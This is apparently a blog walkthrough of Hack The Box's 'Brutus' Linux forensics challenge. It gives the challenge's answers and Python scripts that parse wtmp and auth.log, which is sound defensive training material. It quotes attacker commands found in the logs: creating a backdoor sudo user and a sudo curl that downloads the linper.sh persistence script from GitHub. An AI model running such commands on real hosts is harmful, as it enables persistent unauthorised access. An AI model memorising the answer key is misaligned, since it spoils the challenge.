Hack The Box is a platform designed to test your hands-on abilities through carefully crafted labs that build your cyber-security skill set. It caters to both defense (Sherlocks, the DFIR challenges) and offense (Machines and Challenges).
What Are Sherlocks on Hack The Box?
On the Hack The Box (HTB) platform, Sherlocks are forensic challenges that place you in the role of a digital detective. Instead of exploiting systems, you analyze evidence left behind—log files, session data, memory dumps—to piece together the story of a compromise. Think of it as reverse hacking: you follow the breadcrumbs left by attackers.
A great example of this is the Brutus Sherlock, a Linux DFIR case study that simulates an SSH brute-force attack, privilege escalation, and the creation of a backdoor user. Let’s dive into how to solve it, what we learn, and why it matters for real-world incident response.
Brutus: The Scenario
You’re given two artifacts:
- auth.log: the text log of authentication events, including SSH login attempts, PAM session open/close lines, sudo invocations and account changes made with useradd/usermod.
- wtmp: a binary file tracking login sessions, typically read with last (last -f wtmp) or utmpdump.
The challenge is to analyze these artifacts and answer investigative questions that reveal how an attacker breached a Linux system, escalated privileges, and maintained access.
Step-by-Step Walkthrough
1. What IP Address Was Used for the Brute Force Attack?
Begin by scanning auth.log for repeated “Failed password” and “Invalid user” messages.
You’ll quickly spot dozens of failures from the same IP, spread across several usernames, within a few seconds:
65.2.161.68
That rate is impossible for a human typing passwords; it is an automated brute-force tool at work.
✅ Answer: 65.2.161.68
2. Which User Account Was Compromised?
After the flood of failed attempts, search auth.log for “Accepted password” entries; each one marks a successful login.
You’ll find a successful login for:
root
This is a major red flag: a direct root login over SSH means the attacker controls the system outright, with no privilege escalation required.
✅ Answer: root
3. When Did the Attacker Open a Terminal Session?
auth.log shows when authentication succeeded, but the question asks for the exact start of the attacker’s terminal session. Brute-force tools typically validate a credential and disconnect at once, so an “Accepted password” line does not by itself prove an interactive login; wtmp records the sessions that were actually given a TTY, so that is the file to use.
Decode it with a utmp parser, here the Python utmp.py script (on a Linux analysis host, utmpdump wtmp or last -f wtmp gives the same information):
python3 utmp.py -o wtmp.out wtmp
Review wtmp.out and you’ll find the attacker’s session starting at:
2024-03-06 06:32:45
✅ Answer: 2024-03-06 06:32:45
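Because wtmp is a fixed-size binary record format rather than text, it helps to see what a decoder actually does with it. The following is an added example written for this page; it is not the utmp.py tool used above and not HTB’s code. It unpacks glibc’s 384-byte struct utmp layout for x86_64 Linux (field order as in utmp(5); other architectures and big-endian systems lay the struct out differently), pairs each USER_PROCESS record with the DEAD_PROCESS record on the same TTY line the way last does, and renders the start time in UTC. The three records it parses are constructed inside the script to mirror the walkthrough’s answer; they are not read from the Sherlock’s wtmp, and the boot time and PID in them are made up.

```python
import socket
import struct
from datetime import datetime, timezone

# glibc struct utmp on x86_64 Linux (see utmp(5)): 384 bytes, little-endian.
#   ut_type(h) pad(2) ut_pid(i) ut_line[32] ut_id[4] ut_user[32] ut_host[256]
#   ut_exit{e_termination(h), e_exit(h)} ut_session(i) ut_tv{tv_sec(i), tv_usec(i)}
#   ut_addr_v6[4](i) __unused[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384 for this layout
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width C string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data: bytes) -> list:
    """Unpack every whole record in a wtmp/utmp byte string into a dict."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        addr = f[11:15]
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]), "id": _cstr(f[3]),
            "user": _cstr(f[4]), "host": _cstr(f[5]),
            # ut_addr_v6[0] holds an IPv4 address in network byte order when the other words are zero
            "addr": socket.inet_ntoa(struct.pack("<i", addr[0])) if addr[0] and not any(addr[1:]) else "",
            # tv_sec is a raw epoch value; the zone you render it in is your choice
            "time": datetime.fromtimestamp(f[9], tz=timezone.utc),
        })
    return records


def login_sessions(records: list) -> list:
    """Pair each USER_PROCESS record with the next DEAD_PROCESS on the same TTY (as `last` does)."""
    open_by_line, sessions = {}, []
    for r in records:
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            start = open_by_line.pop(r["line"])
            sessions.append({"user": start["user"], "host": start["host"] or start["addr"],
                             "line": start["line"], "login": start["time"], "logout": r["time"]})
    for start in open_by_line.values():  # still logged in when wtmp was collected
        sessions.append({"user": start["user"], "host": start["host"] or start["addr"],
                         "line": start["line"], "login": start["time"], "logout": None})
    return sessions


def format_sessions(sessions: list) -> list:
    """Render sessions as last-style lines with ISO timestamps."""
    out = []
    for s in sessions:
        end = s["logout"].strftime("%H:%M:%S") if s["logout"] else "still logged in"
        out.append(f'{s["user"]:<12}{s["line"]:<8}{s["host"]:<16}{s["login"]:%Y-%m-%d %H:%M:%S} - {end}')
    return out


def _record(ut_type, pid, line, ut_id, user, host, when, ip="0.0.0.0") -> bytes:
    """Build one raw record; used only to construct the sample below."""
    addr0 = struct.unpack("<i", socket.inet_aton(ip))[0]
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ut_id.encode(), user.encode(),
                       host.encode(), 0, 0, 0, int(when.timestamp()), 0, addr0, 0, 0, 0)


def _utc(y, mo, d, h, mi, s):
    return datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc)


# Constructed sample (not the Sherlock's wtmp): a boot marker, the attacker's root
# login on pts/1 and its logout. Session times mirror the walkthrough's answers;
# the boot time and PID are made up.
SAMPLE_WTMP = b"".join([
    _record(BOOT_TIME, 0, "~", "~~", "reboot", "", _utc(2024, 3, 6, 6, 17, 15)),
    _record(USER_PROCESS, 2602, "pts/1", "ts/1", "root", "65.2.161.68",
            _utc(2024, 3, 6, 6, 32, 45), ip="65.2.161.68"),
    _record(DEAD_PROCESS, 2602, "pts/1", "ts/1", "", "", _utc(2024, 3, 6, 6, 37, 24)),
])


if __name__ == "__main__":
    for line in format_sessions(login_sessions(parse_wtmp(SAMPLE_WTMP))):
        print(line)
```

To run it against a real artifact, replace SAMPLE_WTMP with the file’s bytes (open("wtmp", "rb").read()). The thing to take from it is that wtmp stores plain epoch seconds, so whichever zone you render in must be the same one you assume for auth.log’s zone-less syslog timestamps when you line the two up.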
4. What Was the Attacker’s Session ID?
On systemd-based distributions, systemd-logind assigns each login a numeric session ID and records it in auth.log right after the PAM “session opened” line written by the same sshd process.
Search auth.log for lines like:
session opened for user root
You’ll find the PAM entry followed by the logind entry that names the session:
session opened for user root(uid=0) by (uid=0)
New session 37 of user root.
✅ Answer: 37
5. What Backdoor User Was Created?
To maintain persistence, attackers often create new users with elevated privileges.
Search auth.log for useradd, usermod, or groupadd; each of these tools writes its own entry to auth.log when it changes an account, so you don’t need shell history to see it.
You’ll find the creation of a new user followed by its addition to the sudo group, equivalent to:
useradd cyberjunkie
usermod -aG sudo cyberjunkie
Membership in the sudo group gives this account root via sudo, so the attacker keeps root-equivalent access through a second, less conspicuous account even if the root password is later changed.
✅ Answer: cyberjunkie
6. What MITRE ATT&CK Technique Was Used for Persistence?
Creating a local user account to persist access maps to:
T1136.001 – Create Account: Local Account
✅ Answer: T1136.001
7. When Did the Attacker’s First Session End?
Still in auth.log, search for:
session closed for user root
Match the close to session 37 by the sshd PID it shares with its “session opened” line (or by the logind “Removed session 37.” entry); the session ended at:
2024-03-06 06:37:24
✅ Answer: 2024-03-06 06:37:24
8. What Command Did the Attacker Execute Using Sudo?
Commands typed in an interactive shell are not recorded in auth.log (for those you would need shell history or auditd), but every sudo invocation is, complete with the invoking user, TTY, working directory and the full COMMAND. Look for lines written by sudo:
You’ll find:
sudo /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
The attacker used root privileges to fetch a script from GitHub, likely for reconnaissance or further persistence tooling; auth.log records only the download, not whether the script was run or what it did.
✅ Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
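The auth.log questions above (steps 1, 2, 4, 5, 7 and 8) are answered by eye in the walkthrough; the following added example, written for this page and not part of the Sherlock or of HTB’s material, answers them programmatically so the same checks can be rerun on any auth.log. It works over a constructed excerpt modelled on the events described above (the hostname server, the PIDs and the ports are made up; the IP, usernames, session ID and timestamps follow the answers). It takes session IDs from the systemd-logind “New session” / “Removed session” lines rather than the pam_unix line, reads sudo’s own COMMAND= records, and the triage() function and its failure threshold are this example’s invention rather than a standard tool.

```python
import re
from collections import Counter, defaultdict

# Constructed auth.log excerpt for this example (not the Sherlock's artifact),
# modelled on the events in the walkthrough: a burst of failures from one IP
# against several usernames, a successful root login, the logind session
# lifecycle, creation of the backdoor user, and one sudo command.
# Hostname, PIDs and ports are made up.
SAMPLE_AUTH_LOG = """\
Mar  6 06:31:31 server sshd[2327]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:31 server sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:31 server sshd[2331]: Failed password for invalid user backup from 65.2.161.68 port 46392 ssh2
Mar  6 06:31:32 server sshd[2335]: Failed password for root from 65.2.161.68 port 46404 ssh2
Mar  6 06:31:32 server sshd[2337]: Failed password for invalid user server_adm from 65.2.161.68 port 46414 ssh2
Mar  6 06:31:33 server sshd[2339]: Failed password for root from 65.2.161.68 port 46428 ssh2
Mar  6 06:31:33 server sshd[2343]: Failed password for invalid user svc_account from 65.2.161.68 port 46436 ssh2
Mar  6 06:32:44 server sshd[2602]: Accepted password for root from 65.2.161.68 port 50216 ssh2
Mar  6 06:32:44 server sshd[2602]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 server systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 server useradd[2692]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:35:15 server usermod[2728]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 server sshd[2602]: pam_unix(sshd:session): session closed for user root
Mar  6 06:37:24 server systemd-logind[411]: Removed session 37.
Mar  6 06:39:38 server sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"  # syslog timestamp: no year, no zone
FAILED_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
ACCEPTED_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>[\d.]+)")
SESSION_RE = re.compile(TS + r" \S+ systemd-logind\[\d+\]: (?:New session (?P<opened>\d+) of user (?P<user>\S+)\.|Removed session (?P<closed>\d+)\.)")
USERADD_RE = re.compile(TS + r" \S+ useradd\[\d+\]: new user: name=(?P<user>[^,]+)")
USERMOD_RE = re.compile(TS + r" \S+ usermod\[\d+\]: add '(?P<user>[^']+)' to group '(?P<group>[^']+)'")
SUDO_RE = re.compile(TS + r" \S+ sudo:\s+(?P<user>\S+) : .*?COMMAND=(?P<cmd>.+)$")


def brute_force_sources(lines, threshold=5):
    """Step 1: {ip: (failure_count, usernames_tried)} for sources at or above threshold."""
    fails, names = Counter(), defaultdict(set)
    for m in filter(None, map(FAILED_RE.match, lines)):
        fails[m["ip"]] += 1
        names[m["ip"]].add(m["user"])
    return {ip: (n, sorted(names[ip])) for ip, n in fails.items() if n >= threshold}


def accepted_logins(lines):
    """Step 2: every successful SSH authentication as (timestamp, user, source ip)."""
    return [(m["ts"], m["user"], m["ip"]) for m in filter(None, map(ACCEPTED_RE.match, lines))]


def sessions(lines):
    """Steps 4 and 7: pair logind 'New session' / 'Removed session' lines by session ID."""
    out = {}
    for m in filter(None, map(SESSION_RE.match, lines)):
        if m["opened"]:
            out[int(m["opened"])] = {"user": m["user"], "opened": m["ts"], "closed": None}
        elif int(m["closed"]) in out:
            out[int(m["closed"])]["closed"] = m["ts"]
    return out


def account_changes(lines):
    """Step 5: accounts created by useradd and group additions made by usermod."""
    created = [(m["ts"], m["user"]) for m in filter(None, map(USERADD_RE.match, lines))]
    groups = [(m["ts"], m["user"], m["group"]) for m in filter(None, map(USERMOD_RE.match, lines))]
    return created, groups


def sudo_commands(lines):
    """Step 8: sudo's own audit lines, as (timestamp, invoking user, command)."""
    return [(m["ts"], m["user"], m["cmd"]) for m in filter(None, map(SUDO_RE.match, lines))]


def triage(text, threshold=5):
    """Run every check over one auth.log body and return the findings in one dict."""
    lines = text.splitlines()
    created, groups = account_changes(lines)
    return {
        "brute_force": brute_force_sources(lines, threshold),
        "accepted": accepted_logins(lines),
        "sessions": sessions(lines),
        "accounts_created": created,
        "group_changes": groups,
        "sudo": sudo_commands(lines),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_AUTH_LOG).items():
        print(f"{key}: {value}")
```

On a real case, pass open("auth.log").read() to triage() and raise the threshold to suit the host’s normal failure rate. The syslog timestamps carry neither year nor zone, so when you line these findings up against wtmp (which stores epoch seconds) decide explicitly which zone the host logged in rather than assuming both are local time.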
What Is Hack The Box?
Hack The Box is a hands-on cybersecurity training platform offering virtual labs for offensive and defensive security. From ethical hacking to DFIR, HTB provides a gamified way to learn real-world skills.
It’s not just about exploiting servers. Many challenges focus on defense, like Sherlocks, which simulate breach investigations. You analyze artifacts, reconstruct timelines, and identify malicious behavior—all crucial for SOC analysts and incident responders.
Why Brutus Is a Valuable Learning Tool
The Brutus Sherlock on Hack The Box mirrors a real-world SSH brute-force scenario. You don’t just find a flag—you learn how to:
- Detect brute-force attempts from logs
- Confirm successful authentications
- Decode binary session logs
- Track attacker behavior
- Understand persistence methods
- Map actions to MITRE ATT&CK
Whether you’re a blue teamer in training or preparing for certifications like GCFA or CCFP, Brutus is an excellent exercise.
🏁 Conclusion
This forensic walkthrough of the Brutus Sherlock from Hack The Box takes you from brute-force detection to post-exploitation analysis. You traced the attack back to its source IP, uncovered a root compromise, identified the backdoor user (cyberjunkie), and watched the attacker fetch a script with curl under sudo.
If you’re serious about a career in incident response, challenges like Brutus are some of the most practical training you can get.